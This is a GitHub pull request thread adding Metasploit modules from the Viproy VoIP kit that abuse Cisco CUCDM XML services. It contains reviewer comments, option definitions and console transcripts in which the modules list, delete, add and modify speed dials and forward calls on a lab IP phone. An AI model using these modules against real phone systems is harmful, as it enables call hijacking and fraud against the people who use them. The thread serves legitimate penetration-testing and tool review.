Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits #4065

Merged
merged 4 commits into from
Jan 10, 2015



@fozavci fozavci commented Oct 24, 2014

Viproy VoIP Pen-Test Kit CUCDM exploitation modules for the call forwarding and speed dial manipulation attacks.

Sample usage and packet captures are available at the following link.
https://github.com/fozavci/viproy-voipkit/blob/master/OTHERSUSAGE.md

Usage video and demonstration are available at the following video.
https://www.youtube.com/watch?v=6lUFMXfBw94

def initialize(info = {})
super(
'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
'Version' => '1',

This field isn't used by the framework, please, delete it.

@jvazquez-r7

Please do one pull request per module. It allows handling them more easily and faster (no need to wait until all the modules are ready; modules can be landed once they are okay).

OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
OptString.new('ACTION', [ true, 'Call forwarding action (FORWARD,INFO)', 'FORWARD']),
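
Review bot: on the MAC and FORWARDTO lines, both options are marked required yet ship with placeholder defaults ('000000000000' and '007'), so the required check can never fire and a run with untouched options would submit a forwarding change built from dummy values. Consider dropping the defaults so the operator has to set both explicitly, and checking that MAC is 12 hex digits before any request is made.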

Please use Actions for this purpose, not a datastore ACTION. You can review Msf::Module::HasActions for the internals. If you are just interested in how to use them, there are examples in the framework. For example modules/auxiliary/admin/http/axigen_file_access, modules/auxiliary/admin/http/mutiny_frontend_read_delete,... You can search auxiliary modules with the 'Actions' metadata field for examples!


fozavci commented Oct 28, 2014

I have fixed the findings; would you check them again, please? Also, I will use separate pull requests for future ones, thanks.


fozavci commented Nov 4, 2014

These exploits do not require Skinny or SIP libraries. Please check the new version again, and commit your code modification suggestions, and then I can merge them.
You can test them on my fake service in the description.

Author sections are fixed

fozavci commented Nov 12, 2014

Is there any progress on this module? It seems OK, and a test server was provided as well.

@jvazquez-r7 jvazquez-r7 self-assigned this Jan 10, 2015
@jvazquez-r7 jvazquez-r7 merged commit d91ffa8 into rapid7:master Jan 10, 2015
jvazquez-r7 added a commit that referenced this pull request Jan 10, 2015
@jvazquez-r7

Did the final result by myself; check the final result here: 49f04fa

The modules would benefit from some extra cleanup, but I think the version landed is good enough to go.

Thanks @fozavci, I used your test server code for testing; it was really helpful.

msf auxiliary(cisco_cucdm_speed_dials) > set action List
action => List
msf auxiliary(cisco_cucdm_speed_dials) > run

[*] 172.16.158.133:8080 - Getting Speed Dials of the IP phone
[+] 172.16.158.133:8080 - Position: 1, Name: jane, Telephone: 9823
[+] 172.16.158.133:8080 - Position: 2, Name: john, Telephone: 123
[+] 172.16.158.133:8080 - Position: 3, Name: viproy, Telephone: 007
[+] 172.16.158.133:8080 - Position: 4, Name: joe, Telephone: 2142
[+] 172.16.158.133:8080 - Position: 29, Name: viproxyyyy, Telephone: 007
[*] Auxiliary module execution completed
msf auxiliary(cisco_cucdm_speed_dials) > set action Delete
action => Delete
msf auxiliary(cisco_cucdm_speed_dials) > run

[*] 172.16.158.133:8080 - Deleting Speed Dial of the IP phone
[+] 172.16.158.133:8080 - Speed Dial 3 is deleted successfully
[*] Auxiliary module execution completed
msf auxiliary(cisco_cucdm_speed_dials) > set Action Modify
Action => Modify
msf auxiliary(cisco_cucdm_speed_dials) > run

[*] 172.16.158.133:8080 - Deleting Speed Dial of the IP phone
[+] 172.16.158.133:8080 - Speed Dial 3 is deleted successfully
[*] 172.16.158.133:8080 - Adding Speed Dial to the IP phone
[+] 172.16.158.133:8080 - Speed Dial 3 is added successfully
[*] Auxiliary module execution completed
msf auxiliary(cisco_cucdm_speed_dials) > set Action Add
Action => Add
msf auxiliary(cisco_cucdm_speed_dials) > run

[*] 172.16.158.133:8080 - Adding Speed Dial to the IP phone
[-] 172.16.158.133:8080 - Speed Dial is exist, change the position or choose modify!
[*] Auxiliary module execution completed
msf auxiliary(cisco_cucdm_speed_dials) > show options

Module options (auxiliary/voip/cisco_cucdm_speed_dials):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   MAC        001795A603C2     yes       MAC Address of target phone
   NAME       viproy           no        Name for Speed Dial
   POSITION   3                no        Position for Speed Dial
   Proxies                     no        Use a proxy chain
   RHOST      172.16.158.133   yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /bvsmweb         yes       Target URI for XML services
   TELNO      007              no        Phone number for Speed Dial
   VHOST                       no        HTTP server virtual host


Auxiliary action:

   Name  Description
   ----  -----------
   Add   Adding a speeddial for the MAC address


msf auxiliary(cisco_cucdm_speed_dials) > set POSITION 33
POSITION => 33
msf auxiliary(cisco_cucdm_speed_dials) > run

[*] 172.16.158.133:8080 - Adding Speed Dial to the IP phone
[+] 172.16.158.133:8080 - Speed Dial 33 is added successfully
[*] Auxiliary module execution completed
msf auxiliary(cisco_cucdm_speed_dials) > exit -y
msf auxiliary(cisco_cucdm_callforward) > set FINTNUMBER 123
FINTNUMBER => 123
msf auxiliary(cisco_cucdm_callforward) > run

[*] 172.16.158.133:8080 - Sending call forward request for 123
[+] 172.16.158.133:8080 - Call forwarded successfully for 123
[*] Auxiliary module execution completed
msf auxiliary(cisco_cucdm_callforward) > exit
